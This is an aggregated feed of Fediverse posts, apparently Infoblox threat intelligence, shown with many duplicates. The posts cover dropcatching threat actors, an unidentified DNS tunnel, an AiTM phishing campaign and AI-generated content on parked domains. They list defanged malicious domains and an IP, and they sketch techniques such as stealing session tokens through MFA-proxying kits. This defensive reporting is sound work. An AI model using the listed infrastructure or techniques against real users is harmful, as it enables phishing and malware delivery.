home.social

#infoblox — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #infoblox, aggregated by home.social.

fetched live
  1. Cybercriminals are re-registering expired domains to exploit their existing reputation and traffic, redirecting users to scams and malware. This 'dropcatching' tactic highlights the need for vigilant domain management and proactive cybersecurity measures to prevent such exploits.

    #Cybersecurity #DomainSecurity #Dropcatching #Malware #Scams #Infoblox

    thedailytechfeed.com/hackers-e

  2. Three actors. Zero sites compromised. Thousands of victims inherited.

    In the third installment of our dropcatch series, we introduce three new opportunistic scavengers: actors who don't hack websites, but dropcatch the domains previous attackers left embedded in tens of thousands of compromised sites to redirect the inherited traffic to their own operations. We call these actors Stuffy Squirrel, Shady Squirrel, and Swiping Squirrel.

    Most notably, in collaboration with @rmceoin, we discovered Shady Squirrel began using their catalogue of dropcatch domains to send traffic to SocGholish shortly after Operation Endgame's disruption of the actor in June.

    ⛔️ Sample IOCs:
    Stuffy Squirrel: gsstats[.]ru, weatherplllatform[.]com
    Shady Squirrel: advanceslibrary[.]com, blacksaltys[.]com
    Swiping Squirrel: blackshelter[.]org, jqueryapihelpers[.]com

    Full indicators on GitHub. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #phishing

  3. Three actors. Zero sites compromised. Thousands of victims inherited.

    In the third installment of our dropcatch series, we introduce three new opportunistic scavengers: actors who don't hack websites, but dropcatch the domains previous attackers left embedded in tens of thousands of compromised sites to redirect the inherited traffic to their own operations. We call these actors Stuffy Squirrel, Shady Squirrel, and Swiping Squirrel.

    Most notably, in collaboration with @rmceoin, we discovered Shady Squirrel began using their catalogue of dropcatch domains to send traffic to SocGholish shortly after Operation Endgame's disruption of the actor in June.

    ⛔️ Sample IOCs:
    Stuffy Squirrel: gsstats[.]ru, weatherplllatform[.]com
    Shady Squirrel: advanceslibrary[.]com, blacksaltys[.]com
    Swiping Squirrel: blackshelter[.]org, jqueryapihelpers[.]com

    Full indicators on GitHub. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #phishing

  4. Three actors. Zero sites compromised. Thousands of victims inherited.

    In the third installment of our dropcatch series, we introduce three new opportunistic scavengers: actors who don't hack websites, but dropcatch the domains previous attackers left embedded in tens of thousands of compromised sites to redirect the inherited traffic to their own operations. We call these actors Stuffy Squirrel, Shady Squirrel, and Swiping Squirrel.

    Most notably, in collaboration with @rmceoin, we discovered Shady Squirrel began using their catalogue of dropcatch domains to send traffic to SocGholish shortly after Operation Endgame's disruption of the actor in June.

    ⛔️ Sample IOCs:
    Stuffy Squirrel: gsstats[.]ru, weatherplllatform[.]com
    Shady Squirrel: advanceslibrary[.]com, blacksaltys[.]com
    Swiping Squirrel: blackshelter[.]org, jqueryapihelpers[.]com

    Full indicators on GitHub. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #phishing

  5. Three actors. Zero sites compromised. Thousands of victims inherited.

    In the third installment of our dropcatch series, we introduce three new opportunistic scavengers: actors who don't hack websites, but dropcatch the domains previous attackers left embedded in tens of thousands of compromised sites to redirect the inherited traffic to their own operations. We call these actors Stuffy Squirrel, Shady Squirrel, and Swiping Squirrel.

    Most notably, in collaboration with @rmceoin, we discovered Shady Squirrel began using their catalogue of dropcatch domains to send traffic to SocGholish shortly after Operation Endgame's disruption of the actor in June.

    ⛔️ Sample IOCs:
    Stuffy Squirrel: gsstats[.]ru, weatherplllatform[.]com
    Shady Squirrel: advanceslibrary[.]com, blacksaltys[.]com
    Swiping Squirrel: blackshelter[.]org, jqueryapihelpers[.]com

    Full indicators on GitHub. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #phishing

  6. Three actors. Zero sites compromised. Thousands of victims inherited.

    In the third installment of our dropcatch series, we introduce three new opportunistic scavengers: actors who don't hack websites, but dropcatch the domains previous attackers left embedded in tens of thousands of compromised sites to redirect the inherited traffic to their own operations. We call these actors Stuffy Squirrel, Shady Squirrel, and Swiping Squirrel.

    Most notably, in collaboration with @rmceoin, we discovered Shady Squirrel began using their catalogue of dropcatch domains to send traffic to SocGholish shortly after Operation Endgame's disruption of the actor in June.

    ⛔️ Sample IOCs:
    Stuffy Squirrel: gsstats[.]ru, weatherplllatform[.]com
    Shady Squirrel: advanceslibrary[.]com, blacksaltys[.]com
    Swiping Squirrel: blackshelter[.]org, jqueryapihelpers[.]com

    Full indicators on GitHub. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #phishing

  7. 💧 🫴 Dropcatching isn't just for domain squatters, it's a goldmine for threat actors looking to hijack established trust. Some registrars make it shockingly easy to snipe high-value domains at auction, even serving up backlink metrics on a silver platter to help buyers find the best targets. A threat actor we track as Sable Squirrel took full advantage of this, spending over 💸 $7 million on dropcaught domains to push malware, run illegal sports streams, and operate a betting ring. That is the highest domain budget we've ever tracked from a single group.

    Here's a wild example of what that money buys. In January 2024, they snatched up veinteractive[.]com (previously registered with CSC Digital Brand Services) for $5.7k. It used to belong to a large London-based adtech firm. Sable Squirrel immediately turned it into an ☣️ AsyncRAT C2 and streaming hub. Because of the domain's history, tens of thousands of sites are still reaching out to it, trying to load a legacy tracking script (tag.js) and providing real-time telemetry. If Sable Squirrel was just slightly more creative, they could have easily hosted their malware on that exact URI path and pulled off a massive supply chain attack. And that's just one domain.

    We just dropped Part 2 of our series on dropcatching, breaking down Sable Squirrel's entire operation. We're sharing over 10,000 of their domains, including ones that used to belong to the US government, Fortune 100s, and major charities.

    Read the full teardown here: infoblox.com/blog/threat-intel

    Some Sable Squirrel dropcatch domains:

    thebreastcancercharities[.]org
    andromda[.]org
    d-rev[.]org
    churchofreality[.]org
    swradioafrica[.]com
    americansecuritytoday[.]com
    2026worldcupnorthamerica[.]com
    poweredbyclear[.]com
    fora[.]tv

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #asyncrat #quasarrat #hiddentear #ransomware #rat #vietnam #sportsbetting #gambling #worldcup #streaming #sports #illegal #adtech #backlink

  8. 💧 🫴 Dropcatching isn't just for domain squatters, it's a goldmine for threat actors looking to hijack established trust. Some registrars make it shockingly easy to snipe high-value domains at auction, even serving up backlink metrics on a silver platter to help buyers find the best targets. A threat actor we track as Sable Squirrel took full advantage of this, spending over 💸 $7 million on dropcaught domains to push malware, run illegal sports streams, and operate a betting ring. That is the highest domain budget we've ever tracked from a single group.

    Here's a wild example of what that money buys. In January 2024, they snatched up veinteractive[.]com (previously registered with CSC Digital Brand Services) for $5.7k. It used to belong to a large London-based adtech firm. Sable Squirrel immediately turned it into an ☣️ AsyncRAT C2 and streaming hub. Because of the domain's history, tens of thousands of sites are still reaching out to it, trying to load a legacy tracking script (tag.js) and providing real-time telemetry. If Sable Squirrel was just slightly more creative, they could have easily hosted their malware on that exact URI path and pulled off a massive supply chain attack. And that's just one domain.

    We just dropped Part 2 of our series on dropcatching, breaking down Sable Squirrel's entire operation. We're sharing over 10,000 of their domains, including ones that used to belong to the US government, Fortune 100s, and major charities.

    Read the full teardown here: infoblox.com/blog/threat-intel

    Some Sable Squirrel dropcatch domains:

    thebreastcancercharities[.]org
    andromda[.]org
    d-rev[.]org
    churchofreality[.]org
    swradioafrica[.]com
    americansecuritytoday[.]com
    2026worldcupnorthamerica[.]com
    poweredbyclear[.]com
    fora[.]tv

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #asyncrat #quasarrat #hiddentear #ransomware #rat #vietnam #sportsbetting #gambling #worldcup #streaming #sports #illegal #adtech #backlink

  9. 💧 🫴 Dropcatching isn't just for domain squatters, it's a goldmine for threat actors looking to hijack established trust. Some registrars make it shockingly easy to snipe high-value domains at auction, even serving up backlink metrics on a silver platter to help buyers find the best targets. A threat actor we track as Sable Squirrel took full advantage of this, spending over 💸 $7 million on dropcaught domains to push malware, run illegal sports streams, and operate a betting ring. That is the highest domain budget we've ever tracked from a single group.

    Here's a wild example of what that money buys. In January 2024, they snatched up veinteractive[.]com (previously registered with CSC Digital Brand Services) for $5.7k. It used to belong to a large London-based adtech firm. Sable Squirrel immediately turned it into an ☣️ AsyncRAT C2 and streaming hub. Because of the domain's history, tens of thousands of sites are still reaching out to it, trying to load a legacy tracking script (tag.js) and providing real-time telemetry. If Sable Squirrel was just slightly more creative, they could have easily hosted their malware on that exact URI path and pulled off a massive supply chain attack. And that's just one domain.

    We just dropped Part 2 of our series on dropcatching, breaking down Sable Squirrel's entire operation. We're sharing over 10,000 of their domains, including ones that used to belong to the US government, Fortune 100s, and major charities.

    Read the full teardown here: infoblox.com/blog/threat-intel

    Some Sable Squirrel dropcatch domains:

    thebreastcancercharities[.]org
    andromda[.]org
    d-rev[.]org
    churchofreality[.]org
    swradioafrica[.]com
    americansecuritytoday[.]com
    2026worldcupnorthamerica[.]com
    poweredbyclear[.]com
    fora[.]tv

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #asyncrat #quasarrat #hiddentear #ransomware #rat #vietnam #sportsbetting #gambling #worldcup #streaming #sports #illegal #adtech #backlink

  10. 💧 🫴 Dropcatching isn't just for domain squatters, it's a goldmine for threat actors looking to hijack established trust. Some registrars make it shockingly easy to snipe high-value domains at auction, even serving up backlink metrics on a silver platter to help buyers find the best targets. A threat actor we track as Sable Squirrel took full advantage of this, spending over 💸 $7 million on dropcaught domains to push malware, run illegal sports streams, and operate a betting ring. That is the highest domain budget we've ever tracked from a single group.

    Here's a wild example of what that money buys. In January 2024, they snatched up veinteractive[.]com (previously registered with CSC Digital Brand Services) for $5.7k. It used to belong to a large London-based adtech firm. Sable Squirrel immediately turned it into an ☣️ AsyncRAT C2 and streaming hub. Because of the domain's history, tens of thousands of sites are still reaching out to it, trying to load a legacy tracking script (tag.js) and providing real-time telemetry. If Sable Squirrel was just slightly more creative, they could have easily hosted their malware on that exact URI path and pulled off a massive supply chain attack. And that's just one domain.

    We just dropped Part 2 of our series on dropcatching, breaking down Sable Squirrel's entire operation. We're sharing over 10,000 of their domains, including ones that used to belong to the US government, Fortune 100s, and major charities.

    Read the full teardown here: infoblox.com/blog/threat-intel

    Some Sable Squirrel dropcatch domains:

    thebreastcancercharities[.]org
    andromda[.]org
    d-rev[.]org
    churchofreality[.]org
    swradioafrica[.]com
    americansecuritytoday[.]com
    2026worldcupnorthamerica[.]com
    poweredbyclear[.]com
    fora[.]tv

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #asyncrat #quasarrat #hiddentear #ransomware #rat #vietnam #sportsbetting #gambling #worldcup #streaming #sports #illegal #adtech #backlink

  11. 💧 🫴 Dropcatching isn't just for domain squatters, it's a goldmine for threat actors looking to hijack established trust. Some registrars make it shockingly easy to snipe high-value domains at auction, even serving up backlink metrics on a silver platter to help buyers find the best targets. A threat actor we track as Sable Squirrel took full advantage of this, spending over 💸 $7 million on dropcaught domains to push malware, run illegal sports streams, and operate a betting ring. That is the highest domain budget we've ever tracked from a single group.

    Here's a wild example of what that money buys. In January 2024, they snatched up veinteractive[.]com (previously registered with CSC Digital Brand Services) for $5.7k. It used to belong to a large London-based adtech firm. Sable Squirrel immediately turned it into an ☣️ AsyncRAT C2 and streaming hub. Because of the domain's history, tens of thousands of sites are still reaching out to it, trying to load a legacy tracking script (tag.js) and providing real-time telemetry. If Sable Squirrel was just slightly more creative, they could have easily hosted their malware on that exact URI path and pulled off a massive supply chain attack. And that's just one domain.

    We just dropped Part 2 of our series on dropcatching, breaking down Sable Squirrel's entire operation. We're sharing over 10,000 of their domains, including ones that used to belong to the US government, Fortune 100s, and major charities.

    Read the full teardown here: infoblox.com/blog/threat-intel

    Some Sable Squirrel dropcatch domains:

    thebreastcancercharities[.]org
    andromda[.]org
    d-rev[.]org
    churchofreality[.]org
    swradioafrica[.]com
    americansecuritytoday[.]com
    2026worldcupnorthamerica[.]com
    poweredbyclear[.]com
    fora[.]tv

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #tds #scam #malware #asyncrat #quasarrat #hiddentear #ransomware #rat #vietnam #sportsbetting #gambling #worldcup #streaming #sports #illegal #adtech #backlink

  12. Drop Something? Don't Worry, Someone Caught It

    Not every expired domain disappears. In our data, we observe roughly 50,000 dropcatch domains every day across gTLDs alone, accounting for nearly 20% of daily gTLD registrations.

    How common is dropcatching? Which TLDs see the most activity? Which registrars show up most often? And why is it so difficult to tell what ultimately happens to these domains?

    We explore those questions in Part 1 of our three-part dropcatch series.
    infoblox.com/blog/threat-intel

    #dns # threatintel #threatinteliigence #dropcatch #icann #tld #infoblox #infobloxthreatinteliigence #cybersecurity #infosec

  13. Drop Something? Don't Worry, Someone Caught It

    Not every expired domain disappears. In our data, we observe roughly 50,000 dropcatch domains every day across gTLDs alone, accounting for nearly 20% of daily gTLD registrations.

    How common is dropcatching? Which TLDs see the most activity? Which registrars show up most often? And why is it so difficult to tell what ultimately happens to these domains?

    We explore those questions in Part 1 of our three-part dropcatch series.
    infoblox.com/blog/threat-intel

    #dns # threatintel #threatinteliigence #dropcatch #icann #tld #infoblox #infobloxthreatinteliigence #cybersecurity #infosec

  14. Drop Something? Don't Worry, Someone Caught It

    Not every expired domain disappears. In our data, we observe roughly 50,000 dropcatch domains every day across gTLDs alone, accounting for nearly 20% of daily gTLD registrations.

    How common is dropcatching? Which TLDs see the most activity? Which registrars show up most often? And why is it so difficult to tell what ultimately happens to these domains?

    We explore those questions in Part 1 of our three-part dropcatch series.
    infoblox.com/blog/threat-intel

    #dns # threatintel #threatinteliigence #dropcatch #icann #tld #infoblox #infobloxthreatinteliigence #cybersecurity #infosec

  15. Drop Something? Don't Worry, Someone Caught It

    Not every expired domain disappears. In our data, we observe roughly 50,000 dropcatch domains every day across gTLDs alone, accounting for nearly 20% of daily gTLD registrations.

    How common is dropcatching? Which TLDs see the most activity? Which registrars show up most often? And why is it so difficult to tell what ultimately happens to these domains?

    We explore those questions in Part 1 of our three-part dropcatch series.
    infoblox.com/blog/threat-intel

    #dns # threatintel #threatinteliigence #dropcatch #icann #tld #infoblox #infobloxthreatinteliigence #cybersecurity #infosec

  16. Drop Something? Don't Worry, Someone Caught It

    Not every expired domain disappears. In our data, we observe roughly 50,000 dropcatch domains every day across gTLDs alone, accounting for nearly 20% of daily gTLD registrations.

    How common is dropcatching? Which TLDs see the most activity? Which registrars show up most often? And why is it so difficult to tell what ultimately happens to these domains?

    We explore those questions in Part 1 of our three-part dropcatch series.
    infoblox.com/blog/threat-intel

    #dns # threatintel #threatinteliigence #dropcatch #icann #tld #infoblox #infobloxthreatinteliigence #cybersecurity #infosec

  17. validx[.]shop looked fine at first glance. "Normal" name servers, a real mail setup, nothing that immediately stood out at the apex level. One subdomain didn't quite fit, though. It was getting DNS queries that were absurdly long and frequent for a new domain that nobody was really visiting. Rather than that being web traffic, we detected it as likely tunneling.

    Turns out it wasn't a one-off. The same setup shows up on hundreds of other domains.

    The domain names follow a similar pattern: short, brandable and portmanteau-y (i.e., cordkit, zenithly, queuebox), spread across a long list of cheap gTLDs with the same registrar.

    The tunnel itself is answering with TXT records like:

    ⚠️ "H2;n=5;k=3;ol=2004;sz=800;cz=gz"

    As best as we can tell, that's a shard count, a reconstruction threshold, a length, a chunk size, and a compression flag. We checked the signature against a number of known DNS tunnelling tools and none of them write a header like this.

    We watched two more domains get registered mid-investigation, hours apart, which was fun to see and immediately block :ablobcatpopcorn:

    We've got the infrastructure and the method. We haven't got a payload, and we haven't matched this header format to anything documented publicly.

    Has anyone else run into this, recognize the TXT format above, or have a sample of a possible malware source? We'd like to hear from you.

    ⛔ validx[.]shop
    ⛔ cordkit[.]online
    ⛔ zenithly[.]best

    ☠️ 95[.]179[.]159[.]229

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #c2

  18. validx[.]shop looked fine at first glance. "Normal" name servers, a real mail setup, nothing that immediately stood out at the apex level. One subdomain didn't quite fit, though. It was getting DNS queries that were absurdly long and frequent for a new domain that nobody was really visiting. Rather than that being web traffic, we detected it as likely tunneling.

    Turns out it wasn't a one-off. The same setup shows up on hundreds of other domains.

    The domain names follow a similar pattern: short, brandable and portmanteau-y (i.e., cordkit, zenithly, queuebox), spread across a long list of cheap gTLDs with the same registrar.

    The tunnel itself is answering with TXT records like:

    ⚠️ "H2;n=5;k=3;ol=2004;sz=800;cz=gz"

    As best as we can tell, that's a shard count, a reconstruction threshold, a length, a chunk size, and a compression flag. We checked the signature against a number of known DNS tunnelling tools and none of them write a header like this.

    We watched two more domains get registered mid-investigation, hours apart, which was fun to see and immediately block :ablobcatpopcorn:

    We've got the infrastructure and the method. We haven't got a payload, and we haven't matched this header format to anything documented publicly.

    Has anyone else run into this, recognize the TXT format above, or have a sample of a possible malware source? We'd like to hear from you.

    ⛔ validx[.]shop
    ⛔ cordkit[.]online
    ⛔ zenithly[.]best

    ☠️ 95[.]179[.]159[.]229

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #c2

  19. validx[.]shop looked fine at first glance. "Normal" name servers, a real mail setup, nothing that immediately stood out at the apex level. One subdomain didn't quite fit, though. It was getting DNS queries that were absurdly long and frequent for a new domain that nobody was really visiting. Rather than that being web traffic, we detected it as likely tunneling.

    Turns out it wasn't a one-off. The same setup shows up on hundreds of other domains.

    The domain names follow a similar pattern: short, brandable and portmanteau-y (i.e., cordkit, zenithly, queuebox), spread across a long list of cheap gTLDs with the same registrar.

    The tunnel itself is answering with TXT records like:

    ⚠️ "H2;n=5;k=3;ol=2004;sz=800;cz=gz"

    As best as we can tell, that's a shard count, a reconstruction threshold, a length, a chunk size, and a compression flag. We checked the signature against a number of known DNS tunnelling tools and none of them write a header like this.

    We watched two more domains get registered mid-investigation, hours apart, which was fun to see and immediately block :ablobcatpopcorn:

    We've got the infrastructure and the method. We haven't got a payload, and we haven't matched this header format to anything documented publicly.

    Has anyone else run into this, recognize the TXT format above, or have a sample of a possible malware source? We'd like to hear from you.

    ⛔ validx[.]shop
    ⛔ cordkit[.]online
    ⛔ zenithly[.]best

    ☠️ 95[.]179[.]159[.]229

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #c2

  20. validx[.]shop looked fine at first glance. "Normal" name servers, a real mail setup, nothing that immediately stood out at the apex level. One subdomain didn't quite fit, though. It was getting DNS queries that were absurdly long and frequent for a new domain that nobody was really visiting. Rather than that being web traffic, we detected it as likely tunneling.

    Turns out it wasn't a one-off. The same setup shows up on hundreds of other domains.

    The domain names follow a similar pattern: short, brandable and portmanteau-y (i.e., cordkit, zenithly, queuebox), spread across a long list of cheap gTLDs with the same registrar.

    The tunnel itself is answering with TXT records like:

    ⚠️ "H2;n=5;k=3;ol=2004;sz=800;cz=gz"

    As best as we can tell, that's a shard count, a reconstruction threshold, a length, a chunk size, and a compression flag. We checked the signature against a number of known DNS tunnelling tools and none of them write a header like this.

    We watched two more domains get registered mid-investigation, hours apart, which was fun to see and immediately block :ablobcatpopcorn:

    We've got the infrastructure and the method. We haven't got a payload, and we haven't matched this header format to anything documented publicly.

    Has anyone else run into this, recognize the TXT format above, or have a sample of a possible malware source? We'd like to hear from you.

    ⛔ validx[.]shop
    ⛔ cordkit[.]online
    ⛔ zenithly[.]best

    ☠️ 95[.]179[.]159[.]229

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #c2

  21. validx[.]shop looked fine at first glance. "Normal" name servers, a real mail setup, nothing that immediately stood out at the apex level. One subdomain didn't quite fit, though. It was getting DNS queries that were absurdly long and frequent for a new domain that nobody was really visiting. Rather than that being web traffic, we detected it as likely tunneling.

    Turns out it wasn't a one-off. The same setup shows up on hundreds of other domains.

    The domain names follow a similar pattern: short, brandable and portmanteau-y (i.e., cordkit, zenithly, queuebox), spread across a long list of cheap gTLDs with the same registrar.

    The tunnel itself is answering with TXT records like:

    ⚠️ "H2;n=5;k=3;ol=2004;sz=800;cz=gz"

    As best as we can tell, that's a shard count, a reconstruction threshold, a length, a chunk size, and a compression flag. We checked the signature against a number of known DNS tunnelling tools and none of them write a header like this.

    We watched two more domains get registered mid-investigation, hours apart, which was fun to see and immediately block :ablobcatpopcorn:

    We've got the infrastructure and the method. We haven't got a payload, and we haven't matched this header format to anything documented publicly.

    Has anyone else run into this, recognize the TXT format above, or have a sample of a possible malware source? We'd like to hear from you.

    ⛔ validx[.]shop
    ⛔ cordkit[.]online
    ⛔ zenithly[.]best

    ☠️ 95[.]179[.]159[.]229

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #c2

  22. Fresh AIOps series blog about Kentik (and InfoBlox because of acquisition). Fun speculation about what might come from it! And many links, as usual. Hashtags: #PeterWelcher #CCIE1773 #AIOps #NetOps #Infoblox #Kentik #AIOpsTools. URL: linkedin.com/pulse/aiops-tools

  23. Fresh AIOps series blog about Kentik (and InfoBlox because of acquisition). Fun speculation about what might come from it! And many links, as usual. Hashtags: #PeterWelcher #CCIE1773 #AIOps #NetOps #Infoblox #Kentik #AIOpsTools. URL: linkedin.com/pulse/aiops-tools

  24. Fresh AIOps series blog about Kentik (and InfoBlox because of acquisition). Fun speculation about what might come from it! And many links, as usual. Hashtags: #PeterWelcher #CCIE1773 #AIOps #NetOps #Infoblox #Kentik #AIOpsTools. URL: linkedin.com/pulse/aiops-tools

  25. Fresh AIOps series blog about Kentik (and InfoBlox because of acquisition). Fun speculation about what might come from it! And many links, as usual. Hashtags: #PeterWelcher #CCIE1773 #AIOps #NetOps #Infoblox #Kentik #AIOpsTools. URL: linkedin.com/pulse/aiops-tools

  26. Fresh AIOps series blog about Kentik (and InfoBlox because of acquisition). Fun speculation about what might come from it! And many links, as usual. Hashtags: #PeterWelcher #CCIE1773 #AIOps #NetOps #Infoblox #Kentik #AIOpsTools. URL: linkedin.com/pulse/aiops-tools

  27. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  28. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  29. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  30. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  31. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  32. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  33. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  34. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

